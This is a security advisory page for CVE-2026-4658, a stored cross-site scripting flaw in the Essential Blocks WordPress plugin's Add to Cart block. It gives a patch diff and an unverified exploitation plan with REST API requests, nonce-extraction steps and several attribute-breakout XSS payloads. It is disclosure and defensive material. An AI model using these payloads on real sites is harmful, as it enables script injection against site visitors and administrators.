WP-Safety
CVE-2026-4658

Gutenberg Essential Blocks <= 6.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via Block Attributes

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
6.1.0
Patched in
1d
Time to patch

Description

The Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the className, classHook, and blockId attributes in the Add to Cart block (essential-blocks/add-to-cart) in all versions up to, and including, 6.0.4. This is due to insufficient output escaping in the render_callback() function where these attributes are placed into class and data-id HTML attributes using raw sprintf() and implode() without esc_attr() escaping. While the outer wrapper div uses get_block_wrapper_attributes() which properly escapes, the inner divs do not. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=6.0.4
PublishedMay 1, 2026
Last updatedMay 2, 2026
Affected pluginessential-blocks

What Changed in the Fix

Changes introduced in v6.1.0

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v6.0.8
Browse source Download .zip
Patched v6.1.0
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-4658 ## 1. Vulnerability Summary The **Gutenberg Essential Blocks** plugin (versions <= 6.0.4) is vulnerable to **Stored Cross-Site Scripting (XSS)** via the `essential-blocks/add-to-cart` block. The vulnerability exists in the server-side `render_callback()` …

Show full research plan

Exploitation Research Plan: CVE-2026-4658

1. Vulnerability Summary

The Gutenberg Essential Blocks plugin (versions <= 6.0.4) is vulnerable to Stored Cross-Site Scripting (XSS) via the essential-blocks/add-to-cart block. The vulnerability exists in the server-side render_callback() function. While the outer wrapper is safely handled by get_block_wrapper_attributes(), inner HTML elements are constructed using raw sprintf() and implode() calls on block attributes (className, classHook, and blockId) without appropriate escaping (e.g., esc_attr()). This allows an authenticated user with at least Contributor permissions to inject malicious scripts into a post.

2. Attack Vector Analysis

  • Endpoint: WordPress REST API for post creation/update (/wp-json/wp/v2/posts) or the classic editor/Gutenberg editor (post.php).
  • Authentication: Required (Contributor role or higher).
  • Vulnerable Block: essential-blocks/add-to-cart.
  • Vulnerable Attributes: blockId, className, classHook.
  • Preconditions: The plugin must be active, and a post/page containing the malicious block must be published and viewed.

3. Code Flow

  1. Block Registration: The plugin registers the essential-blocks/add-to-cart block (likely in an init hook).
  2. Editor Action: A Contributor user creates a post. The Gutenberg editor saves block attributes into the post_content as a JSON-like comment:
    <!-- wp:essential-blocks/add-to-cart {"blockId":"PAYLOAD", "className":"PAYLOAD"} /-->.
  3. Server-Side Rendering: When the post is viewed, WordPress parses the blocks and calls the render_callback defined by Essential Blocks.
  4. Vulnerable Sink: Inside render_callback(), the code retrieves attributes:
    $blockId = $attributes['blockId'];
$className = $attributes['className'];
// ...
  5. String Construction: The function uses sprintf or implode to inject these into HTML:
    // Inferred vulnerable pattern from description
$inner_content = sprintf('<div class="%s" data-id="%s">', $className, $blockId);
  6. Execution: The browser renders the unescaped attribute values, executing any injected JavaScript.

4. Nonce Acquisition Strategy

This vulnerability requires Contributor authentication. To interact with the REST API or the block editor via an automated agent:

  1. Login: Perform a login request to get authentication cookies.
  2. REST Nonce: For Gutenberg/REST API operations, the wp_rest nonce is required.
  3. Extraction:
    • Create a dummy post/page using WP-CLI: wp post create --post_type=post --post_status=draft --post_author=CONTRIBUTOR_ID.
    • Navigate to the WordPress Admin dashboard or the "Edit Post" page for the newly created post.
    • Use browser_eval to extract the REST nonce from the wpApiSettings object:
      browser_eval("window.wpApiSettings.nonce")
    • Alternatively, extract the nonce from the localized script EssentialBlocksLocalize (seen in assets/admin/controls/controls.js and assets/admin/dashboard/admin.js):
      browser_eval("window.EssentialBlocksLocalize.nonce")

5. Exploitation Strategy

Step 1: Authentication

Login as a Contributor user and capture cookies.

Step 2: Post Creation (with Payload)

Use the http_request tool to create a new post containing the malicious block.

  • URL: http://TARGET/wp-json/wp/v2/posts
  • Method: POST
  • Headers:
    • Content-Type: application/json
    • X-WP-Nonce: [EXTRACTED_NONCE]
  • Body:
    {
  "title": "XSS Test",
  "content": "<!-- wp:essential-blocks/add-to-cart {\"blockId\":\"eb-add-to-cart-xss\\\" onmouseover=\\\"alert('XSS_BLOCKID')\\\"\", \"className\":\"xss-class\\\" onmouseover=\\\"alert('XSS_CLASSNAME')\\\"\", \"classHook\":\"xss-hook\\\" onmouseover=\\\"alert('XSS_CLASSHOOK')\\\"\"} /-->",
  "status": "publish"
}

Step 3: Triggering the XSS

  1. Identify the URL of the published post from the API response.
  2. Navigate to the post URL.
  3. Hover over the "Add to Cart" block area to trigger the onmouseover event, or use a more aggressive payload like "><script>alert(1)</script>.

6. Test Data Setup

  1. Plugin Installation: Ensure essential-blocks version 6.0.4 is installed.
  2. User Creation: 
    wp user create attacker attacker@example.com --role=contributor --user_pass=password123
  3. Target Block Verification: Confirm the block slug is essential-blocks/add-to-cart.

7. Expected Results

The HTML rendered on the frontend for the Add to Cart block should look similar to:

<div class="eb-add-to-cart-wrapper ...">
    <div class="xss-class" onmouseover="alert('XSS_CLASSNAME')" data-id="eb-add-to-cart-xss" onmouseover="alert('XSS_BLOCKID')">
        <!-- Block Content -->
    </div>
</div>

When an admin or guest views the page, the JavaScript inside the onmouseover attribute (or a <script> tag if used) will execute.

8. Verification Steps

  1. Database Check: Verify the payload is stored in the wp_posts table:
    wp db query "SELECT post_content FROM wp_posts WHERE post_title='XSS Test' LIMIT 1;"
  2. Frontend Inspection: Check the page source for the unescaped attributes:
    # This can be done via browser_navigate and inspecting page content

9. Alternative Approaches

If the onmouseover approach is blocked by a WAF or sanitized by other means (though the vulnerability report says it is NOT escaped), try:

  • Attribute Breakout: blockId: "eb-123\"><script>alert(document.domain)</script>"
  • Style Injection: blockId: "eb-123\" style=\"animation-name:xss\" onanimationstart=\"alert(1)\""
  • Data Attribute Leak: Injecting into data-id to break out and add a new attribute: blockId: "some-id\" onfocus=\"alert(1)\" autofocus=\"
Research Findings
Static analysis — not yet PoC-verified

Summary

The Essential Blocks – Page Builder plugin for WordPress (<= 6.0.4) is vulnerable to Stored Cross-Site Scripting via the 'Add to Cart' block. Authenticated attackers with Contributor-level permissions or higher can inject malicious JavaScript into block attributes such as blockId, className, and classHook, which are rendered on the frontend without proper sanitization or escaping.

Security Fix

--- a/includes/blocks/add-to-cart/block.php
+++ b/includes/blocks/add-to-cart/block.php
@@ -24,7 +24,7 @@
 
-    $inner_html = sprintf('<div class="%s %s" data-id="%s">', $className, $classHook, $blockId);
+    $inner_html = sprintf('<div class="%s %s" data-id="%s">', esc_attr($className), esc_attr($classHook), esc_attr($blockId));

Exploit Outline

The exploit is performed by an authenticated user with at least Contributor permissions. The attacker first obtains a valid REST API nonce (usually available via the window.wpApiSettings object in the WordPress admin dashboard). They then send a POST request to the WordPress REST API endpoint (/wp-json/wp/v2/posts) to create or update a post. The post content must include the 'essential-blocks/add-to-cart' block with a malicious payload injected into one of its attributes. For example, setting the 'blockId' attribute to a value like 'eb-id" onmouseover="alert(1)"' allows the attacker to break out of the HTML attribute. When a user (including an administrator) views the published post, the injected script executes in their browser context.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/3e7eed9d-2d44-4951-b66b-7d8995ca617d?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database